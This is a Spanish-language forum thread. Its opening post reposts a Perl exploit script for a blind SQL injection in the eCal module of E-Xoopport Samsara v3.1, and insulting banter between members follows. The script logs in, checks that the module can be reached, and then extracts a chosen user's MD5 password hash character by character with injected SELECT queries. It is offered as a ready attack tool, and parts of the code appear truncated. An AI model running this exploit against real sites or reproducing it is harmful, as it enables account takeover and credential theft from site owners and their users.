E-Xoopport - Samsara <= v3.1 (eCal module) Blind SQL Injection Exploit

Iniciado por juh, 26 Septiembre 2010, 06:04 AM

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# [0-Day] E-Xoopport - Samsara <= v3.1 (eCal module) Remote Blind SQL Injection Exploit
# Author/s: _mRkZ_, WaRWolFz Crew
# Created: 2010.09.12 after 0 days the bug was discovered.
# Greetings To: Dante90, Shaddy, StutM, WaRWolFz Crew
# Web Site: www.warwolfz.org

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;

$^O eq 'MSWin32' ? system('cls') : system('clear');

print "

E-Xoopport - Samsara <= v3.1 (eCal Module) Remote Blind SQL Injection Exploit

| Script: E-Xoopport                                |
| Affected versions: 3.1                            |
| Bug: Remote Blind SQL Injection (eCal module)     |
| Author/s: _mRkZ_, WaRWolFz Crew                   |
| Greetz: Dante90, Shaddy, StutM, WarWolFz Crew     |
| Web Site: www.warwolfz.org                        |
| Warn: You must be able to access to 'eCal' Module |

if (@ARGV != 4) {
    print "\r\nUsage: perl expolit_name.pl <VictimeHost> <YourNick> <YourPass> <NickToHack>\r\n";

my $host    = $ARGV[0];
my $usr     = $ARGV[1];
my $pwd     = $ARGV[2];
my $anickde = $ARGV[3];
my $anick   = '0x'.EncHex($anickde);

print "[!] Logging In...\r\n";

my %postdata = (
    uname => "$usr",
    pass => "$pwd",
    op => "login"
my $cookies = HTTP::Cookies->new(
    autosave => 1,

my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");

my $req     = (POST $host."/user.php", \%postdata);
my $request = $ua->request($req);
my $content = $request->content;
if ($content =~ /<h4>Benvenuto su/i) {
    print "[+] Logged in!\r\n";
} else {
    print "[-] Fatal Error: username/password incorrect?\r\n";

print "[!] Checking permissions...\r\n";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
$req = $host."/modules/eCal/location.php?lid=1+AND+1=1";
$request    = $ua->get($req);
$content    = $request->content;
if ($content !~ /<b>Eventi nella località: <\/b>/ig) {
    print "[+] Fatal Error: Access denied\r\n";
} else {
    print "[+] You have permissions\r\n";

print "[!] Exploiting...\r\n";
my $i = 1;
my $pwdchr;
while ($i != 33) {
    my $wn  = 47;
    while (1) {
        my $ua = LWP::UserAgent->new;
        $ua->agent("Mozilla 5.0");
        my $req     = $host."/modules/eCal/location.php?lid=1+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),$i,1))=$wn";
        my $request = $ua->get($req);
        my $content = $request->content;
        open LOGZZ, '>lol.html';
        print LOGZZ $content;
        close LOGZZ;
        if ($content !~ /<b>Eventi nella località: <\/b><a href='localleve\.php\?lid='>/ig) {
            my $cnt = $1;
            $pwdchr .= chr($wn);
            $^O eq 'MSWin32' ? system('cls') : system('clear');
            PrintChars($anickde, $pwdchr);

print "\r\n[!] Exploiting completed!\r\n\r\n";
print "Visit: www.warwolfz.org\r\n\r\n";

sub PrintChars {
    my $anick1 = $_[0];
    my $chars = $_[1];
print "

E-Xoopport - Samsara <= v3.1 (eCal module) Remote Blind SQL Injection Exploit

| Script: E-Xoopport                                |
| Affected versions: 3.1                            |
| Bug: Remote Blind SQL Injection (eCal module)     |
| Author/s: _mRkZ_, WaRWolFz Crew                   |
| Greetz: Dante90, Shaddy, StutM, WarWolFz Crew     |
| Web Site: www.warwolfz.org                        |
| Warn: You must be able to access to 'eCal' Module |

[!] Logging In...
[+] Logged in!
[!] Checking permissions...
[+] You have permissions
[!] Exploiting...
[+] ".$anick1."'s md5 Password: ".$chars."

sub EncHex {
    my $char = $_[0];
    chomp $char;
    my @trans = unpack("H*", "$char");
    return $trans[0];

#[Unit-X] Vuln-X DB 2010.09.21
Let`s the terror begin!!!


juh es un admin infiltrado que se encarga de subir el pagerank del foro sacando temas calientes! jajajaja naaah, es el informador oficial de disclosures... (cuando se entere k sabemos que existe exploit-db.com se cogerá una depre XD)
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tragantas jajja creo que no solo los comparto conlos demas y los documentamos en el foro no creo que aya problema con eso osi sinceramente no me importa si  tu vez mi rank o no ¿Acaso tu me das de comer o me das dinero como para que me importe tu opinion? entonces saquese a la verga morro!
Let`s the terror begin!!!


ok cuando consiga descifrar que acabas de decir te contestaré

PD: no sabes lo que significa pagerank, verdad? se nota... xD
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